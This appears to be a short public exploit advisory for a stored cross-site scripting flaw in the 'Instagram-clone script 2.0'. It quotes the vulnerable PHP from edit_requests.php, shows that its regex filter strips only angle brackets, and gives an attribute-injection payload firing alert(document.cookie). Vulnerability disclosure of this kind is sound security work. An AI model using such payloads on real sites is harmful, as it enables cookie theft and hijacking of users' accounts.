# Exploit Title: Instagram-clone script 2.0 - Persistent cross site scripting # Date: 2018-07-08 # Exploit Author: L0RD # Email: borna.nematzadeh123@gmail.com # Software Link: https://github.com/yTakkar/Instagram-clone/archive/master.zip # Vendor Homepage: https://github.com/yTakkar/Instagram-clone # Version: 2.0 # Tested on: Kali linux ================================================= # POC : Persistent Cross site scripting # vulnerable file : edit_requests.php # vulnerable code : if (isset($_POST['username'])) { $username = preg_replace("#[<> ]#i", "", $_POST['username']); $firstname = preg_replace("#[<> ]#i", "", $_POST['firstname']); $surname = preg_replace("#[<> ]#i", "", $_POST['surname']); $bio = preg_replace("#[<>]#i", "", $_POST['bio']); $instagram = preg_replace("#[<>]#i", "", $_POST['instagram']); $youtube = preg_replace("#[<>]#i", "", $_POST['youtube']); $facebook = preg_replace("#[<>]#i", "", $_POST['facebook']); $twitter = preg_replace("#[<>]#i", "", $_POST['twitter']); $website = preg_replace("#[<>]#i", "", $_POST['website']); $mobile = preg_replace("#[^0-9]#i", "", $_POST['mobile']); $tags = preg_replace("#[\s]#", "-", $_POST['tags']); $session = $_SESSION['id']; $m=$edit->saveProfileEditing($username, $firstname, $surname, $bio, $instagram, $youtube, $facebook, $twitter, $website, $mobile, $tags); $array = array("mssg" => $m); echo json_encode($array); } # preg_replace() function replaces "<>" with null. So we use this payload to bypass regex : # Payload : "onmouseover=" alert(document.cookie) =================================================